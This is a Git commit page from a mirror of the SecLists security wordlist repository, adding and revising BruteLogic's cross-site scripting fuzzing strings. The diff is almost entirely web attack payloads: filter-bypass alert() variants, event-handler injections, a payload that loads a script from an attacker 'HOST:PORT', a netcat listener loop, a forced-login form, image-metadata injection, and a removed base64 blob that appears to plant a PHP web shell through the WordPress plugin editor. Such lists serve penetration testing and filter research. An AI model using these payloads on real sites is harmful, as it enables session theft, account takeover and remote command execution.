sync/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists.git synced 2025-07-18 01:39:18 -04:00
Code Issues Projects Releases Packages Wiki Activity Actions 3

Added BruteLogic's XSS strings.

Browse source
This commit is contained in:
Daniel Miessler 2016-07-20 10:02:28 -07:00
parent 36b3182857
commit b4f21b34f5
2 changed files with 42 additions and 53 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
Fuzzing/BRUTELOGIC-XSS-BYPASS-STRINGS.txt Normal file
View file

@ -0,0 +1,17 @@
alert`1`
alert(1)
alert(1&#x29
alert(1&#41
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
navigator.vibrate(500)
eval(URL.slice(-8))>#alert(1)
eval(location.hash.slice(1)>#alert(1)
innerHTML=location.hash>#<script>alert(1)</script>

78
Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt → Fuzzing/BRUTELOGIC-XSS-STRINGS.txt
View file

@ -6,20 +6,6 @@
'-alert(1)// '-alert(1)//
\'-alert(1)// \'-alert(1)//
</script><svg onload=alert(1)> </script><svg onload=alert(1)>
http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
<svg onload=alert`1`>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert&#40;1&#41>
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<x contenteditable onblur=alert(1)>lose focus! <x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this! <x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this! <x oncopy=alert(1)>copy this!
@ -42,7 +28,7 @@ top[8680439..toString(30)](1)
<script>alert(1)<! <script>alert(1)<!
<script src=//brutelogic.com.br/1.js> <script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1> <script src=//3334957647/1>
%3Cx onxxx=1 %3Cx onxxx=alert(1)
<%78 onxxx=1 <%78 onxxx=1
<x %6Fnxxx=1 <x %6Fnxxx=1
<x o%6Exxx=1 <x o%6Exxx=1
@ -60,23 +46,17 @@ top[8680439..toString(30)](1)
<x%2Fonxxx=1 <x%2Fonxxx=1
<x 1='1'onxxx=1 <x 1='1'onxxx=1
<x 1="1"onxxx=1 <x 1="1"onxxx=1
<[S]x onx[S]xx=1
[S] = stripped char or string
<x </onxxx=1 <x </onxxx=1
<x 1=">" onxxx=1 <x 1=">" onxxx=1
<http://onxxx%3D1/ <http://onxxx%3D1/
<x onxxx=alert(1) 1=' <x onxxx=alert(1) 1='
<svg onload=setInterval(function(){with(document)body. <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
'onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1='
'>alert(1)</script><script/1=' '>alert(1)</script><script/1='
*/alert(1)</script><script>/* */alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1=' */alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
<script>alert(1)</script> <script>alert(1)</script>
<script src=javascript:alert(1)> <script src=javascript:alert(1)>
<iframe src=javascript:alert(1)> <iframe src=javascript:alert(1)>
@ -100,42 +80,34 @@ p=<svg 1='&q='onload='/*&r=*/alert(1)'>
<html ontouchmove=alert(1)> <html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)> <html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)> <body onorientationchange=alert(1)>
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>
<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
"><img src=1 onerror=alert(1)>.gif "><img src=1 onerror=alert(1)>.gif
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<script src="data:&comma;alert(1)// <script src="data:&comma;alert(1)//
"><script src=data:&comma;alert(1)// "><script src=data:&comma;alert(1)//
<script src="//brutelogic.com.br&sol;1.js&num; <script src="//brutelogic.com.br&sol;1.js&num;
"><script src=//brutelogic.com.br&sol;1.js&num; "><script src=//brutelogic.com.br&sol;1.js&num;
<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; <link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; "><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
<?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>
<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
<base href=//0> <base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done <script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)
<script/src="data:&comma;eval(atob(location.hash.slice(1)))//&num; <body onload=alert(1)>
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd <body onpageshow=alert(1)>
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w <body onfocus=alert(1)>
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n <body onhashchange=alert(1)><a href=#x>click this!#x
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV <body onscroll=alert(1)><br><br><br><br>
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE <br><br><br><br><br><br><br><br><br><br>
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl <br><br><br><br><br><br><br><br><br><br>
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD <br><br><br><br><br><br><x id=x>#x
Qp4LnNlbmQoJCk= <body onresize=alert(1)>press F12!
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD <body onhelp=alert(1)>press F1! (MSIE)
& => %26 , # => %23 , + => %2B <marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 5.2 KiB

After

Width:  |  Height:  |  Size: 4.1 KiB